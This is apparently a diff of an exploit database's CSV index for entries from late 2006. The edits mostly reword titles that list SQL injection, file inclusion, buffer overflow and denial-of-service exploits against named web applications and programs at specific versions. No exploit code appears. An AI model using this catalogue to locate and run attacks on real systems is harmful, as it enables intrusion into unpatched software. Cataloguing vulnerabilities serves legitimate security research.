+2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 - (O2PHP Bulletin Board) SQL Injection Exploit",2006-11-18,DarkFig,php,webapps,0 +2811,platforms/php/webapps/2811.txt,"phpWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 +2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution Exploit",2006-11-18,nuffsaid,php,webapps,0 +2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0 +2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - (M3U Filename) Local Buffer Overflow Exploit",2006-11-20,"Greg Linares",windows,local,0 -2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Include",2006-11-21,irvian,php,webapps,0 -2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - (src/ark_inc.php) Remote File Include",2006-11-21,DeltahackingTEAM,php,webapps,0 -2819,platforms/php/webapps/2819.txt,"LDU <= 8.x - (avatarselect id) Remote SQL Injection",2006-11-21,nukedx,php,webapps,0 -2820,platforms/php/webapps/2820.txt,"Seditio <= 1.10 - (avatarselect id) Remote SQL Injection",2006-11-21,nukedx,php,webapps,0 +2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Inclusion",2006-11-21,irvian,php,webapps,0 +2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - (src/ark_inc.php) Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 +2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 +2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - (PLS) Local/Remote Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,remote,0 -2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - (pageid) Remote SQL Injection Exploit",2006-11-21,Revenge,php,webapps,0 +2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - (pageid) SQL Injection Exploit",2006-11-21,Revenge,php,webapps,0 2823,platforms/php/webapps/2823.txt,"aBitWhizzy (abitwhizzy.php) Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0 2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - (ASX Filename) Local Buffer Overflow Exploit",2006-11-21,"Greg Linares",windows,local,0 -2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Include Vulnerabilities",2006-11-21,3l3ctric-Cracker,php,webapps,0 -2827,platforms/php/webapps/2827.txt,"phpPC <= 1.04 - Multiple Remote File Inclusion Vulnerabilities",2006-11-21,iss4m,php,webapps,0 -2828,platforms/asp/webapps/2828.pl,"fipsCMS <= 4.5 - (index.asp) Remote SQL Injection Exploit",2006-11-22,ajann,asp,webapps,0 -2829,platforms/asp/webapps/2829.txt,"fipsGallery <= 1.5 - (index1.asp) Remote SQL Injection",2006-11-22,ajann,asp,webapps,0 -2830,platforms/asp/webapps/2830.txt,"fipsForum <= 2.6 - (default2.asp) Remote SQL Injection",2006-11-22,ajann,asp,webapps,0 -2831,platforms/php/webapps/2831.txt,"a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 +2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion Vulnerabilities",2006-11-21,3l3ctric-Cracker,php,webapps,0 +2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion Vulnerabilities",2006-11-21,iss4m,php,webapps,0 +2828,platforms/asp/webapps/2828.pl,"fipsCMS 4.5 - (index.asp) SQL Injection Exploit",2006-11-22,ajann,asp,webapps,0 +2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 +2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0 +2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b (common.inc.php) Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0 2832,platforms/php/webapps/2832.txt,"Messagerie Locale (centre.php) - Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 2833,platforms/php/webapps/2833.txt,"Site News (centre.php) - Remote File Inclusion",2006-11-23,DaDIsS,php,webapps,0 -2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 -2835,platforms/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - Remote SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 -2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - (index.asp) Remote SQL Injection",2006-11-23,ajann,php,webapps,0 -2837,platforms/multiple/remote/2837.sql,"Oracle <= 9i / 10g (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 -2838,platforms/php/webapps/2838.txt,"HSRS 1.0 - (addcode.php) Remote File Include",2006-11-23,"Cold Zero",php,webapps,0 -2839,platforms/php/webapps/2839.txt,"OWLLib 1.0 - (OWLMemoryProperty.php) Remote File Include",2006-11-23,DeltahackingTEAM,php,webapps,0 -2840,platforms/php/webapps/2840.txt,"PEGames (index.php) Remote File Include",2006-11-23,DeltahackingTEAM,php,webapps,0 +2834,platforms/php/webapps/2834.txt,"Recipes Complete Website 1.1.14 - SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 +2835,platforms/php/webapps/2835.txt,"Wallpaper Complete Website 1.0.09 - SQL Injection Vulnerabilities",2006-11-23,GregStar,php,webapps,0 +2836,platforms/php/webapps/2836.txt,"JiRos FAQ Manager 1.0 - (index.asp) SQL Injection",2006-11-23,ajann,php,webapps,0 +2837,platforms/multiple/remote/2837.sql,"Oracle 9i / 10g (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0 +2838,platforms/php/webapps/2838.txt,"HSRS 1.0 - (addcode.php) Remote File Inclusion",2006-11-23,"Cold Zero",php,webapps,0 +2839,platforms/php/webapps/2839.txt,"OWLLib 1.0 - (OWLMemoryProperty.php) Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps,0 +2840,platforms/php/webapps/2840.txt,"PEGames (index.php) Remote File Inclusion",2006-11-23,DeltahackingTEAM,php,webapps,0 2841,platforms/php/webapps/2841.php,"Woltlab Burning Board Lite 1.0.2 decode_cookie() SQL Injection Exploit",2006-11-24,rgod,php,webapps,0 2842,platforms/php/webapps/2842.php,"Woltlab Burning Board Lite 1.0.2 - Blind SQL Injection Exploit",2006-11-23,rgod,php,webapps,0 -2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b (util.php) Remote File Include Exploit",2006-11-24,DeltahackingTEAM,php,webapps,0 +2843,platforms/php/webapps/2843.pl,"PHP-Nuke NukeAI Module 3b (util.php) Remote File Inclusion Exploit",2006-11-24,DeltahackingTEAM,php,webapps,0 2844,platforms/php/webapps/2844.pl,"Cahier de texte 2.0 - (Database Backup/Source Disclosure) Remote Exploit",2006-11-24,DarkFig,php,webapps,0 -2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk <= 0.97.3 - (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0 -2847,platforms/php/webapps/2847.txt,"Sisfo Kampus <= 0.8 - Remote File Inclusion / Download Vulnerabilities",2006-11-25,"Wawan Firmansyah",php,webapps,0 -2848,platforms/asp/webapps/2848.txt,"Basic Forum <= 1.1 - (edit.asp) Remote SQL Injection",2006-11-25,bolivar,asp,webapps,0 -2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community <= 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0 -2850,platforms/php/webapps/2850.txt,"Exhibit Engine <= 1.22 - (styles.php) Remote File Include",2006-11-25,Kacper,php,webapps,0 -2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod <= 1.21 - Remote SQL Injection",2006-11-26,"the master",php,webapps,0 +2846,platforms/asp/webapps/2846.txt,"Liberum Help Desk 0.97.3 - (details.asp) SQL Injection",2006-11-25,ajann,asp,webapps,0 +2847,platforms/php/webapps/2847.txt,"Sisfo Kampus 0.8 - Remote File Inclusion / Download Vulnerabilities",2006-11-25,"Wawan Firmansyah",php,webapps,0 +2848,platforms/asp/webapps/2848.txt,"Basic Forum 1.1 - (edit.asp) SQL Injection",2006-11-25,bolivar,asp,webapps,0 +2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0 +2850,platforms/php/webapps/2850.txt,"Exhibit Engine 1.22 - (styles.php) Remote File Inclusion",2006-11-25,Kacper,php,webapps,0 +2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",php,webapps,0 2852,platforms/php/webapps/2852.txt,"com_flyspray Mambo Com. <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0 -2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 - (admin/edit.asp) Remote SQL Injection",2006-11-26,bolivar,asp,webapps,0 -2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 -2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 +2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - (admin/edit.asp) SQL Injection",2006-11-26,bolivar,asp,webapps,0 +2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 +2855,platforms/windows/dos/2855.py,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow Exploit (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 -2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0 +2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0 2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0 2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0 -2860,platforms/windows/dos/2860.c,"Quintessential Player <= 4.50.1.82 - (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 -2861,platforms/windows/dos/2861.c,"Songbird Media Player <= 0.2 Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 +2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 +2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 -2863,platforms/php/webapps/2863.php,"kubix <= 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 -2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Include",2006-11-29,tarkus,php,webapps,0 -2865,platforms/windows/remote/2865.rb,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 +2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 +2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 +2865,platforms/windows/remote/2865.rb,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0 2867,platforms/php/webapps/2867.php,"PHPGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 -2869,platforms/php/webapps/2869.php,"Serendipity <= 1.0.3 - (comment.php) Local File Include Exploit",2006-11-30,Kacper,php,webapps,0 +2869,platforms/php/webapps/2869.php,"Serendipity 1.0.3 - (comment.php) Local File Inclusion Exploit",2006-11-30,Kacper,php,webapps,0 2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 -2871,platforms/php/webapps/2871.txt,"LDU <= 8.x - (polls.php) Remote SQL Injection",2006-11-30,ajann,php,webapps,0 +2871,platforms/php/webapps/2871.txt,"LDU 8.x - (polls.php) SQL Injection",2006-11-30,ajann,php,webapps,0 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit",2006-11-30,Expanders,windows,local,0 2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0 2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0 @@ -2555,161 +2555,161 @@ id,file,description,date,author,platform,type,port 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0 2879,platforms/windows/dos/2879.py,"Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0Day)",2006-12-01,h07,windows,dos,0 -2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player <= 2.1 - Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 +2880,platforms/windows/local/2880.c,"BlazeVideo HDTV Player 2.1 - Malformed PLF Buffer Overflow PoC",2006-12-01,"Greg Linares",windows,local,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - (XSS/Local File Disclosure) Vulnerabilities",2006-12-01,ajann,asp,webapps,0 2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Path Disclosure/Include) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - (search.php) Remote Include",2006-12-02,DeltahackingTEAM,php,webapps,0 -2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies <= 1.3.0 - Remote File Include",2006-12-02,bd0rk,php,webapps,0 +2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 2886,platforms/php/webapps/2886.txt,"PHP Upload Center 2.0 - (activate.php) File Include Vulnerabilities",2006-12-03,GregStar,php,webapps,0 -2887,platforms/windows/remote/2887.pl,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69 -2888,platforms/php/webapps/2888.php,"Envolution <= 1.1.0 - (PNSVlang) Remote Code Execution Exploit",2006-12-03,Kacper,php,webapps,0 +2887,platforms/windows/remote/2887.pl,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow Exploit",2006-12-03,"Jacopo Cervini",windows,remote,69 +2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution Exploit",2006-12-03,Kacper,php,webapps,0 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion Exploit",2006-12-03,r0ut3r,php,webapps,0 -2890,platforms/php/webapps/2890.txt,"php-revista <= 1.1.2 - (adodb) Multiple Remote File Include Vulnerabilities",2006-12-03,"Cold Zero",php,webapps,0 -2891,platforms/php/webapps/2891.txt,"cutenews aj-fork <= 167f (cutepath) Remote File Include",2006-12-04,DeltahackingTEAM,php,webapps,0 +2890,platforms/php/webapps/2890.txt,"php-revista 1.1.2 - (adodb) Multiple Remote File Inclusion Vulnerabilities",2006-12-03,"Cold Zero",php,webapps,0 +2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f (cutepath) Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 2892,platforms/linux/dos/2892.py,"F-Prot Antivirus 4.6.6 - (ACE) Denial of Service Exploit",2006-12-04,"Evgeny Legerov",linux,dos,0 2893,platforms/linux/dos/2893.py,"F-Prot Antivirus 4.6.6 - (CHM) Heap Overflow Exploit PoC",2006-12-04,"Evgeny Legerov",linux,dos,0 -2894,platforms/php/webapps/2894.txt,"Phorum <= 3.2.11 - (common.php) Remote File Include",2006-12-06,Mr-m07,php,webapps,0 -2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface <= 2.1b (link) Remote File Include Exploit",2006-12-07,3l3ctric-Cracker,php,webapps,0 +2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - (common.php) Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 +2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b (link) Remote File Inclusion Exploit",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) <= 1.2.1015 File Include",2006-12-08,3l3ctric-Cracker,php,webapps,0 -2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 - (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 +2897,platforms/php/webapps/2897.txt,"CM68 News 12.02.06 - (addpth) Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 - (render.php) Remote File Inclusion",2006-12-08,r0ut3r,php,webapps,0 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection",2006-12-08,koray,php,webapps,0 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 - (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 - (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 -2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include",2006-12-09,bd0rk,php,webapps,0 -2905,platforms/php/webapps/2905.txt,"Gizzar <= 03162002 - (index.php) Remote File Include",2006-12-09,DeltahackingTEAM,php,webapps,0 -2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - (news.php) Remote SQL Injection Exploit",2006-12-09,Bl0od3r,php,webapps,0 -2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - (login.asp) Remote SQL Injection",2006-12-09,ajann,asp,webapps,0 -2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - (product) Remote SQL Injection",2006-12-09,ajann,asp,webapps,0 -2909,platforms/asp/webapps/2909.txt,"HR Assist <= 1.05 - (vdateUsr.asp) Remote Login ByPass",2006-12-09,ajann,asp,webapps,0 +2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 +2905,platforms/php/webapps/2905.txt,"Gizzar 03162002 - (index.php) Remote File Inclusion",2006-12-09,DeltahackingTEAM,php,webapps,0 +2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - (news.php) SQL Injection Exploit",2006-12-09,Bl0od3r,php,webapps,0 +2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - (login.asp) SQL Injection",2006-12-09,ajann,asp,webapps,0 +2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - (product) SQL Injection",2006-12-09,ajann,asp,webapps,0 +2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - (vdateUsr.asp) Remote Login ByPass",2006-12-09,ajann,asp,webapps,0 2910,platforms/multiple/dos/2910.txt,"Sophos Antivirus - .CHM File Heap Overflow PoC",2006-12-10,"Damian Put",multiple,dos,0 2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0 -2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 - (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 -2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 +2913,platforms/php/webapps/2913.php,"phpAlbum 0.4.1 Beta 6 - (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 +2914,platforms/windows/dos/2914.php,"Filezilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - (common.php) Remote Inclusion",2006-12-11,bd0rk,php,webapps,0 -2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include",2006-12-11,3l3ctric-Cracker,php,webapps,0 -2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 - (interface.php) Remote File Include",2006-12-11,DeltahackingTEAM,php,webapps,0 -2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Include",2006-12-12,Lu7k,php,webapps,0 +2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Inclusion",2006-12-11,3l3ctric-Cracker,php,webapps,0 +2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 - (interface.php) Remote File Inclusion",2006-12-11,DeltahackingTEAM,php,webapps,0 +2921,platforms/php/webapps/2921.txt,"mxBB Module mx_modsdb 1.0 - Remote File Inclusion",2006-12-12,Lu7k,php,webapps,0 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - (malformed pointer) Proof of Concept",2006-12-12,DiscoJonny,windows,dos,0 -2923,platforms/php/webapps/2923.txt,"BLOG:CMS <= 4.1.3 - (NP_UserSharing.php) Remote Inclusion",2006-12-12,"HACKERS PAL",php,webapps,0 -2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods <= 2.0.2 - Remote Inclusion Vulnerabilities",2006-12-12,3l3ctric-Cracker,php,webapps,0 +2923,platforms/php/webapps/2923.txt,"BLOG:CMS 4.1.3 - (NP_UserSharing.php) Remote Inclusion",2006-12-12,"HACKERS PAL",php,webapps,0 +2924,platforms/php/webapps/2924.txt,"mxBB Module kb_mods 2.0.2 - Remote Inclusion Vulnerabilities",2006-12-12,3l3ctric-Cracker,php,webapps,0 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0 -2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 - (basic.inc.php) Remote File Include",2006-12-13,v1per-haCker,php,webapps,0 -2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0 +2927,platforms/php/webapps/2927.txt,"PhpMyCMS 0.3 - (basic.inc.php) Remote File Inclusion",2006-12-13,v1per-haCker,php,webapps,0 +2928,platforms/linux/dos/2928.py,"ProFTPD 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0 -2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0 -2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include",2006-12-14,ex0,php,webapps,0 -2933,platforms/linux/remote/2933.c,"OpenLDAP <= 2.4.3 - (KBIND) Remote Buffer Overflow Exploit",2006-12-15,"Solar Eclipse",linux,remote,389 +2930,platforms/php/webapps/2930.pl,"yaplap 0.6.1b (ldap.php) Remote File Inclusion Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0 +2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Inclusion",2006-12-14,ex0,php,webapps,0 +2933,platforms/linux/remote/2933.c,"OpenLDAP 2.4.3 - (KBIND) Remote Buffer Overflow Exploit",2006-12-15,"Solar Eclipse",linux,remote,389 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service Exploit",2006-12-15,rgod,windows,dos,0 2935,platforms/windows/dos/2935.sh,"Windows Media Player 9/10 - (.MID) Denial of Service Exploit",2006-12-15,sehato,windows,dos,0 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 -2937,platforms/php/webapps/2937.php,"extreme-fusion <= 4.02 - Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 -2938,platforms/php/webapps/2938.htm,"Bandwebsite <= 1.5 - (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 -2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks <= 2.05 - Remote Inclusion",2006-12-16,ajann,php,webapps,0 -2940,platforms/php/webapps/2940.txt,"mxbb module charts <= 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 -2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting <= 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0 +2937,platforms/php/webapps/2937.php,"extreme-fusion 4.02 - Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 +2938,platforms/php/webapps/2938.htm,"Bandwebsite 1.5 - (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 +2939,platforms/php/webapps/2939.txt,"mxBB Module WebLinks 2.05 - Remote Inclusion",2006-12-16,ajann,php,webapps,0 +2940,platforms/php/webapps/2940.txt,"mxbb module charts 1.0.0 - Remote File Inclusion",2006-12-16,ajann,php,webapps,0 +2941,platforms/php/webapps/2941.txt,"mxBB Module Meeting 1.1.2 - Remote FileInclusion",2006-12-16,ajann,php,webapps,0 2942,platforms/windows/dos/2942.py,"Star FTP Server 1.10 - (RETR) Remote Denial of Service Exploit",2006-12-17,Necro,windows,dos,0 -2943,platforms/php/webapps/2943.txt,"Azucar CMS <= 1.3 - (admin/index_sitios.php) File Inclusion",2006-12-18,nuffsaid,php,webapps,0 -2944,platforms/php/webapps/2944.txt,"VerliAdmin <= 0.3 - (index.php) Remote File Include Exploit",2006-12-18,Kacper,php,webapps,0 -2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) Remote SQL Injection",2006-12-18,"the master",php,webapps,0 +2943,platforms/php/webapps/2943.txt,"Azucar CMS 1.3 - (admin/index_sitios.php) File Inclusion",2006-12-18,nuffsaid,php,webapps,0 +2944,platforms/php/webapps/2944.txt,"VerliAdmin 0.3 - (index.php) Remote File Inclusion Exploit",2006-12-18,Kacper,php,webapps,0 +2945,platforms/php/webapps/2945.txt,"Uploader & Downloader 3.0 - (id_user) SQL Injection",2006-12-18,"the master",php,webapps,0 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit",2006-12-18,shinnai,windows,dos,0 -2947,platforms/multiple/dos/2947.pl,"wget <= 1.10.2 - (Unchecked Boundary Condition) Denial of Service Exploit",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 